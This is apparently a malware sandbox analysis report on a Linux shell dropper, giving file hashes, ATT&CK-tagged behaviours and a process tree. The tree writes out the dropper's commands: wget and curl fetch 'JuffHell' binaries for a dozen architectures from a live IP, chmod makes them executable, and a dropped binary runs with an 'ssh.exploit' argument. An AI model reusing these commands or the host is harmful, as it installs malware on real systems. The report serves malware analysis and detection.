Overview

overview

10

Static

static

10

30c9166a9f...c55.sh

ubuntu-18.04-amd64

7

30c9166a9f...c55.sh

debian-9-armhf

7

30c9166a9f...c55.sh

debian-9-mips

7

30c9166a9f...c55.sh

debian-9-mipsel

7

3d93d26bca...b06.sh

ubuntu-18.04-amd64

3

3d93d26bca...b06.sh

debian-9-armhf

3

3d93d26bca...b06.sh

debian-9-mips

3

3d93d26bca...b06.sh

debian-9-mipsel

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...tor.sh

windows7-x64

3

31.214.157...tor.sh

windows10-2004-x64

3

31.214.157...or1.sh

windows7-x64

3

31.214.157...or1.sh

windows10-2004-x64

3

31.214.157...ode.sh

windows7-x64

3

31.214.157...ode.sh

windows10-2004-x64

3

31.214.157...de1.sh

windows7-x64

3

31.214.157...de1.sh

windows10-2004-x64

3

31.214.157...rst.sh

ubuntu-18.04-amd64

7

31.214.157...rst.sh

debian-9-armhf

7

31.214.157...rst.sh

debian-9-mips

7

31.214.157...rst.sh

debian-9-mipsel

7

31.214.157...ond.sh

ubuntu-18.04-amd64

7

31.214.157...ond.sh

debian-9-armhf

7

31.214.157...ond.sh

debian-9-mips

7

31.214.157...ond.sh

debian-9-mipsel

7

31.214.157...pt3.sh

windows7-x64

3

31.214.157...pt3.sh

windows10-2004-x64

3

31.214.157...ile.sh

ubuntu-18.04-amd64

7

31.214.157...ile.sh

debian-9-armhf

7

31.214.157...ile.sh

debian-9-mips

7

31.214.157...ile.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    2s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    14-10-2024 14:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh

  • Size

    3KB

  • MD5

    4de883db50a87d2eaf32038a6f48a3cf

  • SHA1

    5d786ee84056677315f5eb9315f7a40d7fe8cb94

  • SHA256

    30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55

  • SHA512

    36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d

Score
7/10
defense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 13 IoCs
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 14 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
    /tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
    1⤵
    • Writes file to tmp directory
    PID:1503
    • /usr/bin/wget
      wget http://194.15.36.34/xxx9/JuffHell.x86
      2⤵
        PID:1504
      • /usr/bin/curl
        curl -O http://194.15.36.34/xxx9/JuffHell.x86
        2⤵
        • Writes file to tmp directory
        PID:1511
      • /bin/cat
        cat JuffHell.x86
        2⤵
          PID:1519
        • /bin/chmod
          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
          2⤵
          • File and Directory Permissions Modification
          PID:1520
        • /tmp/dayum0x1a5sfd15as1fa
          ./dayum0x1a5sfd15as1fa ssh.exploit
          2⤵
          • Executes dropped EXE
          PID:1521
        • /usr/bin/wget
          wget http://194.15.36.34/xxx9/JuffHell.mips
          2⤵
          • System Network Configuration Discovery
          PID:1522
        • /usr/bin/curl
          curl -O http://194.15.36.34/xxx9/JuffHell.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:1526
        • /bin/cat
          cat JuffHell.mips
          2⤵
          • System Network Configuration Discovery
          PID:1527
        • /bin/chmod
          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
          2⤵
          • File and Directory Permissions Modification
          PID:1528
        • /tmp/dayum0x1a5sfd15as1fa
          ./dayum0x1a5sfd15as1fa ssh.exploit
          2⤵
          • Executes dropped EXE
          PID:1529
        • /usr/bin/wget
          wget http://194.15.36.34/xxx9/JuffHell.mpsl
          2⤵
            PID:1530
          • /usr/bin/curl
            curl -O http://194.15.36.34/xxx9/JuffHell.mpsl
            2⤵
            • Writes file to tmp directory
            PID:1531
          • /bin/cat
            cat JuffHell.mpsl
            2⤵
              PID:1535
            • /bin/chmod
              chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
              2⤵
              • File and Directory Permissions Modification
              PID:1536
            • /tmp/dayum0x1a5sfd15as1fa
              ./dayum0x1a5sfd15as1fa ssh.exploit
              2⤵
              • Executes dropped EXE
              PID:1537
            • /usr/bin/wget
              wget http://194.15.36.34/xxx9/JuffHell.arm
              2⤵
                PID:1538
              • /usr/bin/curl
                curl -O http://194.15.36.34/xxx9/JuffHell.arm
                2⤵
                • Writes file to tmp directory
                PID:1542
              • /bin/cat
                cat JuffHell.arm
                2⤵
                  PID:1543
                • /bin/chmod
                  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1544
                • /tmp/dayum0x1a5sfd15as1fa
                  ./dayum0x1a5sfd15as1fa ssh.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:1545
                • /usr/bin/wget
                  wget http://194.15.36.34/xxx9/JuffHell.arm5
                  2⤵
                    PID:1546
                  • /usr/bin/curl
                    curl -O http://194.15.36.34/xxx9/JuffHell.arm5
                    2⤵
                    • Writes file to tmp directory
                    PID:1547
                  • /bin/cat
                    cat JuffHell.arm5
                    2⤵
                      PID:1551
                    • /bin/chmod
                      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                      2⤵
                      • File and Directory Permissions Modification
                      PID:1552
                    • /tmp/dayum0x1a5sfd15as1fa
                      ./dayum0x1a5sfd15as1fa ssh.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:1553
                    • /usr/bin/wget
                      wget http://194.15.36.34/xxx9/JuffHell.arm6
                      2⤵
                        PID:1554
                      • /usr/bin/curl
                        curl -O http://194.15.36.34/xxx9/JuffHell.arm6
                        2⤵
                        • Writes file to tmp directory
                        PID:1555
                      • /bin/cat
                        cat JuffHell.arm6
                        2⤵
                          PID:1559
                        • /bin/chmod
                          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                          2⤵
                          • File and Directory Permissions Modification
                          PID:1560
                        • /tmp/dayum0x1a5sfd15as1fa
                          ./dayum0x1a5sfd15as1fa ssh.exploit
                          2⤵
                          • Executes dropped EXE
                          PID:1561
                        • /usr/bin/wget
                          wget http://194.15.36.34/xxx9/JuffHell.arm7
                          2⤵
                            PID:1562
                          • /usr/bin/curl
                            curl -O http://194.15.36.34/xxx9/JuffHell.arm7
                            2⤵
                            • Writes file to tmp directory
                            PID:1563
                          • /bin/cat
                            cat JuffHell.arm7
                            2⤵
                              PID:1567
                            • /bin/chmod
                              chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1568
                            • /tmp/dayum0x1a5sfd15as1fa
                              ./dayum0x1a5sfd15as1fa ssh.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:1569
                            • /usr/bin/wget
                              wget http://194.15.36.34/xxx9/JuffHell.ppc
                              2⤵
                                PID:1570
                              • /usr/bin/curl
                                curl -O http://194.15.36.34/xxx9/JuffHell.ppc
                                2⤵
                                • Writes file to tmp directory
                                PID:1574
                              • /bin/cat
                                cat JuffHell.ppc
                                2⤵
                                  PID:1575
                                • /bin/chmod
                                  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:1576
                                • /tmp/dayum0x1a5sfd15as1fa
                                  ./dayum0x1a5sfd15as1fa ssh.exploit
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1577
                                • /usr/bin/wget
                                  wget http://194.15.36.34/xxx9/JuffHell.m68k
                                  2⤵
                                    PID:1578
                                  • /usr/bin/curl
                                    curl -O http://194.15.36.34/xxx9/JuffHell.m68k
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:1579
                                  • /bin/cat
                                    cat JuffHell.m68k
                                    2⤵
                                      PID:1583
                                    • /bin/chmod
                                      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:1584
                                    • /tmp/dayum0x1a5sfd15as1fa
                                      ./dayum0x1a5sfd15as1fa ssh.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1585
                                    • /usr/bin/wget
                                      wget http://194.15.36.34/xxx9/JuffHell.spc
                                      2⤵
                                        PID:1586
                                      • /usr/bin/curl
                                        curl -O http://194.15.36.34/xxx9/JuffHell.spc
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:1587
                                      • /bin/cat
                                        cat JuffHell.spc
                                        2⤵
                                          PID:1591
                                        • /bin/chmod
                                          chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:1592
                                        • /tmp/dayum0x1a5sfd15as1fa
                                          ./dayum0x1a5sfd15as1fa ssh.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1593
                                        • /usr/bin/wget
                                          wget http://194.15.36.34/xxx9/JuffHell.i686
                                          2⤵
                                            PID:1594
                                          • /usr/bin/curl
                                            curl -O http://194.15.36.34/xxx9/JuffHell.i686
                                            2⤵
                                            • Writes file to tmp directory
                                            PID:1595
                                          • /bin/cat
                                            cat JuffHell.i686
                                            2⤵
                                              PID:1599
                                            • /bin/chmod
                                              chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:1600
                                            • /tmp/dayum0x1a5sfd15as1fa
                                              ./dayum0x1a5sfd15as1fa ssh.exploit
                                              2⤵
                                              • Executes dropped EXE
                                              PID:1601
                                            • /usr/bin/wget
                                              wget http://194.15.36.34/xxx9/JuffHell.sh4
                                              2⤵
                                                PID:1602
                                              • /usr/bin/curl
                                                curl -O http://194.15.36.34/xxx9/JuffHell.sh4
                                                2⤵
                                                • Writes file to tmp directory
                                                PID:1603
                                              • /bin/cat
                                                cat JuffHell.sh4
                                                2⤵
                                                  PID:1607
                                                • /bin/chmod
                                                  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:1608
                                                • /tmp/dayum0x1a5sfd15as1fa
                                                  ./dayum0x1a5sfd15as1fa ssh.exploit
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:1609
                                                • /usr/bin/wget
                                                  wget http://194.15.36.34/xxx9/JuffHell.arc
                                                  2⤵
                                                    PID:1610
                                                  • /usr/bin/curl
                                                    curl -O http://194.15.36.34/xxx9/JuffHell.arc
                                                    2⤵
                                                    • Writes file to tmp directory
                                                    PID:1611
                                                  • /bin/cat
                                                    cat JuffHell.arc
                                                    2⤵
                                                      PID:1615
                                                    • /bin/chmod
                                                      chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh config-err-ZT3yzd dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86 netplan_kq2le0ps snap-private-tmp ssh-TbRC2zG5XbH0 systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-bolt.service-eWTJlw systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-colord.service-GvAKyB systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-ModemManager.service-UBbvwW systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-resolved.service-qqjGKa systemd-private-44090b1fb0ac404ca4d3576ce2c54a0d-systemd-timedated.service-AKzBi3
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:1616
                                                    • /tmp/dayum0x1a5sfd15as1fa
                                                      ./dayum0x1a5sfd15as1fa ssh.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:1617

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • /tmp/JuffHell.x86
                                                    Filesize

                                                    162B

                                                    MD5

                                                    4f8e702cc244ec5d4de32740c0ecbd97

                                                    SHA1

                                                    3adb1f02d5b6054de0046e367c1d687b6cdf7aff

                                                    SHA256

                                                    9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a

                                                    SHA512

                                                    21047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f

                                                    Download Submit